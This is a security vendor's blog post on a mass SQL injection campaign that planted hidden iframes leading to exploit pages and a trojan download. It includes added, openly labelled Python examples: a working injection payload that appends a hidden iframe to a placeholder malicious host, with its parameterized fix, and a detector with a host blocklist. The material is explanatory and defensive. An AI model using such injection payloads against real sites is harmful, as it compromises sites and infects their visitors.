
Barely recovered from the flurry of analysis surrounding the weekend compromise, Trend Micro researchers in Taiwan have discovered yet another attack.

The attackers appear to have carried out another massive SQL injection attack, leaving well over 160,000 Web sites serving a malicious script. The affected sites are diverse in nature, although a large share of them are in the Asia Pacific region.
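To make the mechanism concrete, here is an added example (not code from the original post or from Trend Micro) of the kind of flaw such a campaign exploits: a request handler that pastes a URL parameter straight into SQL, so a single crafted request appends a hidden iframe to every stored page. It runs against an in-memory SQLite database with constructed sample rows and a placeholder host name; the stacked-statement behaviour of some database drivers is emulated with executescript(), and the hardened handler beside it binds the parameter instead.

```python
"""Added example (not from the original post): a SQL-injectable page
handler that lets one request store a malicious iframe in every article,
next to the parameterized fix. In-memory SQLite, constructed data."""
import sqlite3

# Constructed attacker payload. It closes the quoted id, stacks an UPDATE
# that appends a zero-size iframe to every article body, and ends with a
# tautology so the handler's own trailing quote closes cleanly.
# The host name is a placeholder, not a domain from the original post.
INJECTED_TAG = '<iframe src="http://malicious.example/in.htm" width="0" height="0"></iframe>'
PAYLOAD = "1'; UPDATE articles SET body = body || '" + INJECTED_TAG + "' WHERE '1'='1"


def make_db() -> sqlite3.Connection:
    """Fresh in-memory database with two constructed articles."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, "
        "body TEXT, views INTEGER DEFAULT 0)"
    )
    conn.executemany(
        "INSERT INTO articles (title, body) VALUES (?, ?)",
        [("Welcome", "<p>Welcome to the site.</p>"), ("News", "<p>Latest news.</p>")],
    )
    conn.commit()
    return conn


def count_view_vulnerable(conn: sqlite3.Connection, article_id: str) -> str:
    """Vulnerable handler: the request parameter is pasted into the SQL text.

    executescript() runs every statement in the string, which mirrors database
    drivers that accept stacked statements in one call. Returns the SQL that was
    actually executed so the injected statement can be inspected.
    """
    sql = f"UPDATE articles SET views = views + 1 WHERE id = '{article_id}'"
    conn.executescript(sql)
    conn.commit()
    return sql


def count_view_safe(conn: sqlite3.Connection, article_id: str) -> None:
    """Hardened handler: the parameter is bound, so it is data, never SQL."""
    conn.execute("UPDATE articles SET views = views + 1 WHERE id = ?", (article_id,))
    conn.commit()


def infected_article_count(conn: sqlite3.Connection) -> int:
    """How many stored pages now carry an <iframe> tag."""
    row = conn.execute("SELECT COUNT(*) FROM articles WHERE body LIKE '%<iframe%'").fetchone()
    return row[0]


def demo() -> tuple:
    """Return (infected rows after the vulnerable handler, after the safe one)."""
    vuln = make_db()
    count_view_vulnerable(vuln, PAYLOAD)
    hit = infected_article_count(vuln)

    safe = make_db()
    count_view_safe(safe, PAYLOAD)  # matches no row, stores nothing
    miss = infected_article_count(safe)
    return hit, miss


if __name__ == "__main__":
    print(demo())
```

The point of the safe handler is not the `?` placeholder itself but that the driver never parses the parameter as SQL; any string, including one containing quotes and semicolons, can only ever be compared against the id column.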

Figure 1. Trend Micro product in action, blocking access to sites containing this script.

Trend Micro detects the injected script as HTML_IFRAME.NG. When a user visits one of these compromised pages, the script silently loads one of three URLs hosting exploit code. Trend Micro detects the scripts found at these URLs as JS_REALPLR.CB, JS_REALPLR.CD and JS_DLOADER.JYT.

JS_DLOADER.JYT exploits the Microsoft Data Access Components (MDAC) vulnerability described in Microsoft Security Bulletin MS06-014.

All three scripts fetch a URL on the same domain, which downloads 1.exe onto the victim's PC. Trend Micro detected 1.exe as TSPY_LINEAGE.PJ (update: as of this writing the file is detected as TROJ_AGENT.WPA).

The attack chain is illustrated below.

Figure 2. Attack algorithm (infection diagram)

Users whose browsers allow ActiveX controls to run automatically will be infected with the malware above without any interaction. Even where the browser is configured to prompt before running an ActiveX control or downloading a file, users are likely to accept, since they are viewing sites they trust. Applying the MS06-014 update closes the MDAC hole that JS_DLOADER.JYT relies on, but the exploit pages carry other exploits as well, so patching that one component does not by itself break the chain.

A Web threat protection layer is what breaks the infection chain, and it can do so at several points. This matters because the final payload, 1.exe, appears to change with every download, so file signatures alone lag behind it. Blocking the URLs that the injected script redirects to stops the chain before any exploit or payload reaches the user, whatever the payload of the moment happens to be.
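The redirect step described earlier and the blocking step just described, as an added example (not Trend Micro's product logic and not code from the original post): a scanner that pulls the targets of hidden iframes and remote scripts out of a page and checks their hosts against a blocklist, which is the decision a URL-blocking layer makes before the browser ever fetches the exploit page. The sample page, the host names and the blocklist are constructed for illustration.

```python
"""Added example (not from the original post): find the redirect targets an
injected tag points at and decide which hosts to block. Constructed data."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed stand-in for the "related malicious domains" a web-threat
# protection layer refuses to resolve. Placeholder names only.
BLOCKED_HOSTS = {"malicious.example", "exploit-host.example"}

# Constructed page: a legitimate site with an injected zero-size iframe and
# an injected remote script, next to a harmless CDN script.
SAMPLE_PAGE = """<html><body>
<h1>Company News</h1>
<p>Quarterly results are in.</p>
<iframe src="http://malicious.example/in.htm" width="0" height="0"></iframe>
<script src="https://cdn.example/jquery.js"></script>
<script src="http://exploit-host.example/x.js"></script>
</body></html>"""


class RedirectFinder(HTMLParser):
    """Collects (tag, src, hidden) for every iframe and external script."""

    def __init__(self):
        super().__init__()
        self.found = []

    @staticmethod
    def _hidden(attrs: dict) -> bool:
        # Injected frames are usually sized to 0/1 px or styled invisible so
        # the victim sees nothing while the exploit page loads.
        style = (attrs.get("style") or "").replace(" ", "").lower()
        return (
            attrs.get("width") in ("0", "1")
            or attrs.get("height") in ("0", "1")
            or "display:none" in style
            or "visibility:hidden" in style
        )

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        src = a.get("src")
        if tag in ("iframe", "script") and src:
            self.found.append((tag, src, self._hidden(a)))


def classify(html: str) -> list:
    """Return one dict per redirect target with a verdict:
    'block' if the host is blocklisted, 'suspicious' for a hidden iframe
    pointing at an unknown host, otherwise 'allow'."""
    parser = RedirectFinder()
    parser.feed(html)
    results = []
    for tag, src, hidden in parser.found:
        host = urlparse(src).hostname or ""
        if host in BLOCKED_HOSTS:
            verdict = "block"
        elif tag == "iframe" and hidden:
            verdict = "suspicious"
        else:
            verdict = "allow"
        results.append({"tag": tag, "src": src, "host": host, "verdict": verdict})
    return results


def blocked_hosts_in(html: str) -> set:
    """Hosts the blocking layer would refuse for this page."""
    return {r["host"] for r in classify(html) if r["verdict"] == "block"}


if __name__ == "__main__":
    for r in classify(SAMPLE_PAGE):
        print(f"{r['verdict']:10} {r['tag']:6} {r['src']}")
```

The 'suspicious' verdict is the part a blocklist cannot give you: a hidden iframe to a host nobody has seen yet is exactly how a fresh redirect domain looks on day one, so it is worth surfacing even though the host is not (yet) on the list.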

Note: Our regional partners are now trying to reach the appropriate CERTs of the affected sites. We have also blocked all related malicious domains and detected all malicious files.

Consolidated findings of the Research (Taiwan), Escalation, and Threat Response teams at TrendLabs.


© Copyright 2013 Trend Micro Inc. All rights reserved.